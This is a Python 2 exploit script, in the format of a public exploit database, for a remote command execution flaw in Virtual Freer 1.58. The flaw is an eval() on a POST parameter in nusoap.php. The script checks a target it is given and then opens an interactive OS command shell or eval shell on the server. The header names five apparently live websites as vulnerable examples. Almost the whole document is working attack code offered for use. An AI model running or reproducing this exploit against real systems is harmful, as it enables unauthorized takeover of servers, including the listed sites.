# Exploit title : Virtual Freer 1.58 - Remote Command Execution # Exploit Author : SajjadBnd # Date : 2020-02-17 # Vendor Homepage : http://freer.ir/virtual/ # Software Link : http://www.freer.ir/virtual/download.php?action=get # Software Link(mirror) : http://dl.nuller.ir/virtual_freer_v1.58[NuLLeR.iR].zip # Tested on : Ubuntu 19.10 # Version : 1.58 ############################ # [ DESCRIPTION ] # # Free Script For Sell Charging Cards and Virtual Products # # [POC] # # Vulnerable file: /include/libs/nusoap.php # 943: eval($_POST['a74ad8dfacd4f985eb3977517615ce25']); # # POST /include/libs/nusoap.php # payload : a74ad8dfacd4f985eb3977517615ce25=system('uname -a'); # # [ Sample Vulnerable Sites ] # # http://3cure.ir/buy/ # http://cheapcharger.ir/ # http://www.appraworld.ir/ # http://latoon.ir/ # http://novinv.ir/ # import requests import os import sys def clear(): linux = 'clear' windows = 'cls' os.system([linux, windows][os.name == 'nt']) def Banner(): print ''' ################################################# # # # Virtual Freer 1.58 - Remote Command Execution # # SajjadBnd # # BiskooitPedar # # blackwolf@post.com # ################################################# ''' def inputs(): target = raw_input('[*] URL : ') while True: try: r = requests.get(target,verify=False) start(target) except requests.exceptions.MissingSchema: target = "http://" + target def start(target): print "======================\n\n[!] Checking: ****()" url = '%s/include/libs/nusoap.php' % (target) body = {'a74ad8dfacd4f985eb3977517615ce25':'echo vulnerable;'} r = requests.post(url,data=body,allow_redirects=False,timeout=50) content = r.text.encode('utf-8') if 'vulnerable' in content: print "[+] vulnerable: ****()\n" else: print "[-] Target not Vulnerable!" sys.exit(1) print "\n[!] Checking: System()" body = {'a74ad8dfacd4f985eb3977517615ce25':'system(id);'} r = requests.post(url,data=body,allow_redirects=False,timeout=50) content = r.text.decode('utf-8') if 'gid' in content: print "[+] vulnerable: system()\n" osshell(url) else: print "[-] Target not Vulnerable to Running OS Commands!" evalshell(url) def osshell(url): print "======================\n[+] You can run os commands :D\n" while True: try: cmd = raw_input('OS_SHELL $ ') command = "system('%s');" % (cmd) body = {'a74ad8dfacd4f985eb3977517615ce25':command} r = requests.post(url,data=body,allow_redirects=False,timeout=50) content = r.text.encode('utf-8') print "\n",content except KeyboardInterrupt: print "\n____________________\n[+] GoodBye :D" sys.exit(1) def evalshell(url): print "======================\n[+] You can just run Eval Commands :D\n" while True: try: cmd = raw_input('\nEval()=> ') command = '%s;' % (cmd) body = {'a74ad8dfacd4f985eb3977517615ce25':command} r = requests.post(url,data=body,allow_redirects=False,timeout=50) content = r.text.encode('utf-8') print "\n",content except KeyboardInterrupt: print "\n____________________\n[+] ok! GoodBye :D" sys.exit(1) if __name__ == '__main__': clear() Banner() inputs()